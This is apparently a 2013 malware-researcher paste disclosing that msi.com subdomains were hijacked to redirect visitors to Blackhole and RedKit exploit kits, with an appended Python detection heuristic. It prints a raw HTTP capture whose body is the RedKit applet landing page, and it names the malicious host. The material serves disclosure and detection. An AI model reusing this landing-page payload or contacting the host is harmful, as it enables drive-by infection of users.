*.MSI.COM got hacked, redirected to TDS to EK

MalwareMustDie, Jul 15th, 2013
// *.MSI.COM site got redirected by TDS,
// on one occasion to Blackhole sites.
// Just checked, it changed to RedKit sites.

// Note PoC of this case:
http://urlquery.net/report.php?id=3764213
http://urlquery.net/report.php?id=3763965
http://urlquery.net/report.php?id=3764205

// Below RedKit PoC of the redirected URL:
//  h00p://kristians1.net/blog/?p=5613

GET /blog/?p=5613 HTTP/1.1
Host: kristians1.net
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://fr.msi.com/

HTTP/1.1 200 OK
Date: Mon, 15 Jul 2013 17:56:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
X-Curl-Errno: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173
Connection: close
Content-Type: text/html

<html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>

---
#MalwareMustDie!
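
Added example (not part of the original paste): a proxy-log triage heuristic that flags responses shaped like the capture above, i.e. an applet carrying a jnlp_href param, served as a tiny page, reached with a Referer from a different host. The indicator names, the 512-byte threshold and the benign sample are assumptions made for this sketch.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Landing-page body exactly as captured in the paste above.
LANDING = ('<html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" />'
           '<param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet>'
           '</table></body></html>')
# Constructed benign page for comparison (not from the paste).
BENIGN = '<html><body><h1>Blog</h1><p>' + 'Hello world. ' * 40 + '</p></body></html>'


class AppletScan(HTMLParser):
    """Collect <param> name/value pairs that sit inside an <applet> element."""

    def __init__(self):
        super().__init__()
        self.depth = 0      # nesting depth of open <applet> tags
        self.params = {}    # lower-cased param name -> value

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing <param ... /> via handle_startendtag.
        if tag == "applet":
            self.depth += 1
        elif tag == "param" and self.depth:
            a = dict(attrs)
            self.params[(a.get("name") or "").lower()] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet" and self.depth:
            self.depth -= 1


def score_response(request_host, referer, body):
    """Return the heuristic indicators (assumed names) that fire for one response."""
    scan = AppletScan()
    scan.feed(body)
    scan.close()
    hits = []
    if "jnlp_href" in scan.params:           # JNLP-launched applet, as in the capture
        hits.append("applet-jnlp_href")
    ref_host = urlsplit(referer).hostname if referer else None
    if ref_host and ref_host != request_host.lower():
        hits.append("cross-site-referer")    # e.g. fr.msi.com -> kristians1.net
    if scan.params and len(body) < 512:      # assumed threshold; capture is 173 bytes
        hits.append("tiny-applet-only-page")
    return hits
```

A single indicator is weak on its own (Referer can be absent, and legitimate sites once used JNLP applets); the combination of all three is what matches this capture.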